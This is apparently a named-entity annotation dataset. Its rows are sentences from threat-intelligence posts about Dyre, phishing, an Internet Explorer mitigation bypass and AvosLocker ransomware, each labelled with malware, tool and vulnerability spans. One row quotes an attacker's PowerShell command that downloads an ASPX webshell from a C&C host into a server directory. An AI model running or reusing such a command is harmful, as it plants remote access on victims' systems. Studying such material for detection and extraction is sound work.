id
int64
1
14.4k
text
stringlengths
3
5.01k
entities
list
relations
list
Comments
list
1,717
The Dyre banking Trojan has multiple C2 mechanisms, including encrypted HTTPS requests to a list of hard-coded IP addresses, a DGA generating 1,000 new domains each day as well as an I2P based plugin.
[ { "id": 46891, "label": "malware", "start_offset": 5, "end_offset": 24 }, { "id": 46892, "label": "SOFTWARE", "start_offset": 184, "end_offset": 187 } ]
[]
[]
1,718
These many C2 mechanisms make Dyre much more difficult to fully take down than a simple single (or small group) of C2s.
[ { "id": 46893, "label": "malware", "start_offset": 30, "end_offset": 34 } ]
[]
[]
1,719
the following IP address are known Dyre C2 servers.
[ { "id": 45113, "label": "Infrastucture", "start_offset": 35, "end_offset": 50 } ]
[]
[]
1,720
It’s not possible to list all of the domains generated by the DGA, which is the main advantage of this mechanism. To protect your network from the I2P communication used by both Dyre and CryptoWall 3.0, the easiest route is simply to identify I2P traffic and block it completely.
[ { "id": 5120, "label": "malware", "start_offset": 189, "end_offset": 199 }, { "id": 46894, "label": "malware", "start_offset": 180, "end_offset": 184 }, { "id": 46895, "label": "SOFTWARE", "start_offset": 149, "end_offset": 152 }, { "id": 46896, "label": "SOFTWARE", "start_offset": 245, "end_offset": 248 } ]
[]
[]
1,721
While there are certainly many legitimate reasons to use an anonymity network, many organizations should be wary of I2P (or Tor) traffic transiting their network.
[ { "id": 46898, "label": "SOFTWARE", "start_offset": 116, "end_offset": 119 }, { "id": 46897, "label": "tools", "start_offset": 124, "end_offset": 127 } ]
[]
[]
1,722
Palo Alto Networks App-ID technology can identify I2P traffic as well 51 other tunneling applications.
[ { "id": 45115, "label": "SOFTWARE", "start_offset": 50, "end_offset": 53 }, { "id": 5127, "label": "identity", "start_offset": 0, "end_offset": 18 } ]
[]
[]
1,723
Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!
[]
[]
[]
1,724
Please mark, I'm not a robot!
[]
[]
[]
1,725
By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.
[]
[]
[]
1,726
In recent research, Palo Alto Networks found attackers were creating fake versions of some well-known and well-trusted websites – including Adobe, DropBox, Facebook, and others- and putting malicious links to these sites into phishing emails sent to unsuspecting victims.
[ { "id": 46901, "label": "SOFTWARE", "start_offset": 147, "end_offset": 153 }, { "id": 46903, "label": "identity", "start_offset": 20, "end_offset": 38 }, { "id": 46899, "label": "attack-pattern", "start_offset": 226, "end_offset": 241 }, { "id": 46900, "label": "SOFTWARE", "start_offset": 140, "end_offset": 145 }, { "id": 46902, "label": "SOFTWARE", "start_offset": 156, "end_offset": 164 } ]
[]
[]
1,727
Here we explain this type of attack and what you should do.
[]
[]
[]
1,728
What is it?
[]
[]
[]
1,729
A method attackers use to target you using email that you might not know about.
[]
[]
[]
1,730
Why should I care, what can it do to me?
[]
[]
[]
1,731
Attackers can gain access to your personal and financial information.
[]
[]
[]
1,732
They can also steal your computer’s processing power to mine for cryptocurrencies, which slows down your system.
[]
[]
[]
1,733
How can I prevent it?
[]
[]
[]
1,734
Avoid clicking on links that you get in email.
[]
[]
[]
1,735
If you get an email and need to go to that website, type the address in your web browser yourself.
[]
[]
[]
1,736
If the link is an email from someone you know, you can also contact them to find out if they meant to send it, and if it is safe to visit.
[]
[]
[]
1,737
What causes it?
[]
[]
[]
1,738
Attackers know that people will click on links in email.
[]
[]
[]
1,739
Especially when you get an email from someone that looks like someone you trust.
[]
[]
[]
1,740
How does it work?
[]
[]
[]
1,741
Attackers send emails that appear to be from a person or company that you trust.
[]
[]
[]
1,742
These emails contain malicious links that, when clicked on, lead you to an attacker’s page.
[]
[]
[]
1,743
In addition to taking steps so the attacker’s page mimics a legitimate one, attackers often mirror well known security images, like the lock symbol, to convince you that you are on a secure site.
[]
[]
[]
1,744
Once you’re on the attacker’s page, the attackers may ask you for personal information (like usernames, passwords, and bank account information) or to install software, or both.
[]
[]
[]
1,745
In recent research, we found attackers were using fake versions of some well-known and well-trusted sites:
[]
[]
[]
1,746
About: Threat Briefs are meant to help busy people understand real-world threats and how they can prevent them in their lives.
[]
[]
[]
1,747
They’re put together by Palo Alto Networks Unit 42 threat research team and are meant for you to read and share with your family, friends, and coworkers so you can all be safer and get on with the business of your digital life.
[ { "id": 46904, "label": "identity", "start_offset": 24, "end_offset": 71 } ]
[]
[]
1,748
Got a topic you want us to write about for you, your friends, or your family?
[]
[]
[]
1,749
Email us at [email protected].
[ { "id": 45116, "label": "EMAIL", "start_offset": 12, "end_offset": 41 } ]
[]
[]
1,750
Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!
[]
[]
[]
1,751
Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.
[]
[]
[]
1,752
In February, Microsoft awarded $100,000 to Yu Yang (@Tombkeeper) for reporting a new mitigation bypass technique as part of Microsoft’s Bounty Program.
[ { "id": 45119, "label": "identity", "start_offset": 43, "end_offset": 50 }, { "id": 45120, "label": "identity", "start_offset": 52, "end_offset": 63 }, { "id": 45117, "label": "TIME", "start_offset": 3, "end_offset": 11 }, { "id": 45121, "label": "identity", "start_offset": 124, "end_offset": 133 }, { "id": 45118, "label": "identity", "start_offset": 13, "end_offset": 22 } ]
[]
[]
1,753
Yu later demonstrated his research at CanSecWest in March.
[ { "id": 46905, "label": "identity", "start_offset": 0, "end_offset": 2 } ]
[]
[]
1,754
In his slides, he mentioned that a "god mode" of Internet Explorer could be turned on by a one byte overwrite.
[ { "id": 46906, "label": "SOFTWARE", "start_offset": 49, "end_offset": 66 } ]
[]
[]
1,755
However, he had to heavily redact this information due to an agreement between himself and Microsoft.
[ { "id": 45122, "label": "identity", "start_offset": 91, "end_offset": 100 } ]
[]
[]
1,756
After his slides were released, researchers began working to determine what the missing parts were.
[]
[]
[]
1,757
And before long, Yuki Chen (@guhe120), a Chinese researcher, posted his answer.
[ { "id": 46908, "label": "identity", "start_offset": 28, "end_offset": 36 }, { "id": 46907, "label": "identity", "start_offset": 17, "end_offset": 26 }, { "id": 46909, "label": "location", "start_offset": 41, "end_offset": 48 } ]
[ { "id": 254, "from_id": 46907, "to_id": 46908, "type": "duplicate-of" }, { "id": 255, "from_id": 46907, "to_id": 46909, "type": "located-at" }, { "id": 256, "from_id": 46908, "to_id": 46909, "type": "located-at" } ]
[]
1,758
Although the code was removed soon after posting, a copy was still maintained and used by Metasploit.
[ { "id": 45123, "label": "tools", "start_offset": 90, "end_offset": 100 } ]
[]
[]
1,759
Following this code, another researcher posted his VB script version using more advanced techniques.
[]
[]
[]
1,760
Yu Yang then pasted his shellcode that used similar methods to run arbitrary code, showing that the method Yuki Chen used is exactly the one that won Yu the $100,000 award.
[ { "id": 46910, "label": "identity", "start_offset": 0, "end_offset": 7 }, { "id": 46911, "label": "identity", "start_offset": 107, "end_offset": 116 }, { "id": 46912, "label": "identity", "start_offset": 150, "end_offset": 152 } ]
[]
[]
1,761
The main idea of new exploitation technique is to alter a flag that is used to control the security setting of an ActiveX object.
[]
[]
[]
1,762
If an attacker could modify it, then any script can be run, such as downloading and executing a PE file, without any notification or alert.
[]
[]
[]
1,763
Further details were discussed in depth last month on Rapid7’s blog.
[ { "id": 46913, "label": "identity", "start_offset": 53, "end_offset": 60 } ]
[]
[]
1,764
The most interesting aspect of this method is that it could bypass all existing mitigation techniques including DEP/ASLR/EMET, and it also defeats some academic methods such as Control Flow Integrity (CFI).
[]
[]
[]
1,765
So this raises another question: If there are no mitigation functions, do we have any other ways to defend against attacks similar to this?
[]
[]
[]
1,766
The first line of defense is the IPS.
[]
[]
[]
1,767
Although an attacker can use a variety of obfuscation techniques for HTML, we are still able to extract some features to create signatures.
[]
[]
[]
1,768
To address such an issue, we’ve created signatures 36442, 36468, and 36469 to provide coverage for the security flag overwrite.
[]
[]
[]
1,769
Although we are not aware of any attacks using this technique, these signatures have proven effective in our testing against code publicly available on the Internet. When we take a closer look at the three exploits in our blog post last month, we see that various exploit techniques are based on a singular condition, which is arbitrary memory access.
[]
[]
[]
1,770
Only when attackers have the right to read/write any address can they utilize either Flash or ActiveX methods to get code execution.
[]
[]
[]
1,771
If we went even further, all three vulnerabilities are Use-After-Free bugs.
[]
[]
[]
1,772
The three vulnerabilities each contain code to alter a user-controlled address, and the code can be distilled down to the following operations:
[]
[]
[]
1,773
Here, xyz indicates a user-controlled address that contains the length of a vector object or length of an Int32Array.
[]
[]
[]
1,774
Using these operations, attackers are able to modify the length values to create an object with an incorrect size, which will allow for read and write operations to occur in memory that is not part of the vector object.
[]
[]
[]
1,775
The attackers can then use this object to perform further operations such as modification of security flag in ActiveX. To prevent such attacks, a better idea is to detect if an arbitrary address is accessed during execution.
[]
[]
[]
1,776
In WildFire, we added modules for web browser scripts and third party plugins such as Flash.
[ { "id": 45125, "label": "SOFTWARE", "start_offset": 3, "end_offset": 11 }, { "id": 45126, "label": "SOFTWARE", "start_offset": 86, "end_offset": 91 } ]
[]
[]
1,777
One such module leverages the fact that the length of a vector object is always consistent with memory allocation, which means we can deduce the memory usage from the sum of the length of all allocated vectors.
[]
[]
[]
1,778
If the calculated value does not match the real value, it indicates some of the vector objects may have been modified.
[]
[]
[]
1,779
Using this method, we are able to provide length checking for Flash vector objects.
[ { "id": 45127, "label": "SOFTWARE", "start_offset": 62, "end_offset": 67 } ]
[]
[]
1,780
This module validates the accessing behavior at runtime.
[]
[]
[]
1,781
If the length were suspicious, the detection module stops the malicious operation.
[]
[]
[]
1,782
Through our enterprise security platform, including IPS and WildFire, we continue to innovate and prevent advanced exploitation techniques.
[ { "id": 45128, "label": "SOFTWARE", "start_offset": 60, "end_offset": 68 } ]
[]
[]
1,783
Leave a comment below let us know what you think.
[]
[]
[]
1,784
Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!
[]
[]
[]
1,785
Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.
[]
[]
[]
1,786
We found samples of AvosLocker ransomware that makes use of a legitimate driver file to disable antivirus solutions and detection evasion.
[ { "id": 5282, "label": "malware", "start_offset": 20, "end_offset": 30 } ]
[]
[]
1,787
While previous AvosLocker infections employ similar routines, this is the first sample we observed from the US with the capability to disable a defense solution using a legitimate Avast Anti-Rootkit Driver file (asWarPot.sys).
[ { "id": 5285, "label": "malware", "start_offset": 15, "end_offset": 25 }, { "id": 46915, "label": "FILEPATH", "start_offset": 212, "end_offset": 224 }, { "id": 46916, "label": "SOFTWARE", "start_offset": 180, "end_offset": 205 }, { "id": 46917, "label": "location", "start_offset": 108, "end_offset": 110 } ]
[ { "id": 257, "from_id": 5285, "to_id": 46916, "type": "targets" }, { "id": 258, "from_id": 5285, "to_id": 46917, "type": "targets" } ]
[]
1,788
In addition, the ransomware is also capable of scanning multiple endpoints for the Log4j vulnerability Log4shell using Nmap NSE script.
[ { "id": 45130, "label": "vulnerability", "start_offset": 103, "end_offset": 112 }, { "id": 45129, "label": "tools", "start_offset": 119, "end_offset": 127 }, { "id": 45131, "label": "vulnerability", "start_offset": 83, "end_offset": 88 } ]
[]
[]
1,789
Infection chain Figure 1. AvosLocker infection chain According to our analysis, the suspected entry point is via the Zoho ManageEngine ADSelfService Plus (ADSS) exploit: Figure 2.
[ { "id": 5293, "label": "malware", "start_offset": 31, "end_offset": 41 }, { "id": 46920, "label": "vulnerability", "start_offset": 127, "end_offset": 178 } ]
[ { "id": 260, "from_id": 5293, "to_id": 46920, "type": "exploits" } ]
[]
1,790
The ADSS exploit abusing CVE-2021-40539 Due to the lack of network traffic details, we could not identify the exact CVE ID of the security gap the attacker used.
[ { "id": 46921, "label": "vulnerability", "start_offset": 25, "end_offset": 39 }, { "id": 46922, "label": "malware", "start_offset": 4, "end_offset": 8 } ]
[ { "id": 261, "from_id": 46922, "to_id": 46921, "type": "exploits" } ]
[]
1,791
However, there are some indications that they abused the same vulnerability previously documented by Synacktiv during a pentest, CVE-2021-40539.
[ { "id": 45132, "label": "vulnerability", "start_offset": 129, "end_offset": 143 }, { "id": 45133, "label": "identity", "start_offset": 101, "end_offset": 110 } ]
[]
[]
1,792
The gap we observed was particularly similar to the creation of JSP files (test.jsp), execution of keytool.exe with “null” parameters to run a crafted Java class/code.
[ { "id": 46924, "label": "FILEPATH", "start_offset": 75, "end_offset": 83 }, { "id": 46923, "label": "FILEPATH", "start_offset": 99, "end_offset": 110 } ]
[]
[]
1,793
Mapping the infection
[]
[]
[]
1,794
The ADSS JAVA component (C:\ManageEngine\ADSelfService Plus\jre\bin\java.exe) executed mshta.exe to remotely run a remotely-hosted HTML application (HTA) file from the attackers’ command and control (C&C) server.
[ { "id": 45134, "label": "FILEPATH", "start_offset": 25, "end_offset": 76 }, { "id": 45135, "label": "FILEPATH", "start_offset": 87, "end_offset": 96 } ]
[]
[]
1,795
Using Trend Micro™ Vision One™, we mapped out the processes that the infection performed to spawn the process.
[ { "id": 46925, "label": "SOFTWARE", "start_offset": 6, "end_offset": 30 } ]
[]
[]
1,796
Figure 3. Remotely executing an HTA file from the C&C server.
[]
[]
[]
1,797
Screenshots taken from Trend Micro Vison One.
[ { "id": 45136, "label": "SOFTWARE", "start_offset": 23, "end_offset": 44 } ]
[]
[]
1,798
Figure 4. HTA file connecting to the C&C
[]
[]
[]
1,799
A closer look at the HTA file revealed that the mshta.exe downloads and executes the remotely hosted HTA file.
[]
[]
[]
1,800
The HTA executed an obfuscated PowerShell script that contains a shellcode, capable of connecting back to the C&C server to execute arbitrary commands.
[ { "id": 45137, "label": "tools", "start_offset": 31, "end_offset": 41 } ]
[]
[]
1,801
Figure 5.
[]
[]
[]
1,802
Obfuscated PowerShell script contains a shellcode
[ { "id": 5314, "label": "tools", "start_offset": 11, "end_offset": 21 } ]
[]
[]
1,803
The PowerShell process will download an ASPX webshell from the C&C server using the command < cmd.exe /c powershell -command Invoke-WebRequest -Uri hxxp://xx.xx.xx.xx/subshell.aspx -OutFile /ManageEngine/ADSelfService Plus/webapps/adssp/help/admin-guide >.
[ { "id": 45139, "label": "SOFTWARE", "start_offset": 44, "end_offset": 48 }, { "id": 45140, "label": "Infrastucture", "start_offset": 67, "end_offset": 77 }, { "id": 45141, "label": "URL", "start_offset": 152, "end_offset": 184 }, { "id": 45138, "label": "tools", "start_offset": 8, "end_offset": 18 }, { "id": 45142, "label": "FILEPATH", "start_offset": 194, "end_offset": 257 }, { "id": 5318, "label": "tools", "start_offset": 109, "end_offset": 119 }, { "id": 5317, "label": "tools", "start_offset": 98, "end_offset": 105 } ]
[]
[]
1,804
According to Synacktiv’s research, with this command, the downloaded ASPX webshell is downloaded from a remote IP address and saved to the directory, and still accessible to the attacker.
[ { "id": 46927, "label": "SOFTWARE", "start_offset": 69, "end_offset": 73 }, { "id": 46926, "label": "identity", "start_offset": 13, "end_offset": 22 } ]
[]
[]
1,805
The attackers gathered system information using available tools such as whoami and systeminfo, as well as PowerShell commands.
[ { "id": 5324, "label": "tools", "start_offset": 83, "end_offset": 93 }, { "id": 5325, "label": "tools", "start_offset": 106, "end_offset": 116 }, { "id": 46929, "label": "tools", "start_offset": 72, "end_offset": 78 } ]
[]
[]
1,806
Figure 6.
[]
[]
[]
1,807
Gather system information The code executes on the current domain controller to gather the username information, while the query user information gathers data about user sessions on a Remote Desktop Session Host server, name of the user, session ID, state of the session (either active or disconnected), idle time, date, and time the user logged on.
[]
[]
[]
1,808
Figure 7. Executed with the /domain argument to collect username information Figure 8.
[]
[]
[]
1,809
query user information for session data
[]
[]
[]
1,810
The PowerShell downloads, installs, and allows the remote desktop tool AnyDeskMSI through the firewall.
[ { "id": 46930, "label": "tools", "start_offset": 4, "end_offset": 14 }, { "id": 46931, "label": "tools", "start_offset": 71, "end_offset": 81 } ]
[ { "id": 262, "from_id": 46930, "to_id": 46931, "type": "downloads" } ]
[]
1,811
Figure 9. The PowerShell downloading and installing AnyDeskMSI
[ { "id": 5340, "label": "tools", "start_offset": 19, "end_offset": 29 }, { "id": 46932, "label": "tools", "start_offset": 57, "end_offset": 67 } ]
[ { "id": 263, "from_id": 5340, "to_id": 46932, "type": "downloads" } ]
[]
1,812
We observed that a new user account was created, added to the current domain, and included in the administrator group.
[]
[]
[]
1,813
This ensures the attacker can have administrative rights to the infected system.
[]
[]
[]
1,814
The attackers also checked the running processes in the system via TaskList to check for antivirus processes running in the infiltrated system.
[]
[]
[]
1,815
Figure 10. Creating a new account with admin rights Figure 11. Checking for antivirus processes running During the scan, we observed an attempt to terminate security products initiated via TaskKill.
[]
[]
[]
1,816
Testing the sample with Trend Micro Vision One, the attempt failed as its sensors were still able to send activity data to the platform.
[ { "id": 46933, "label": "SOFTWARE", "start_offset": 24, "end_offset": 46 } ]
[]
[]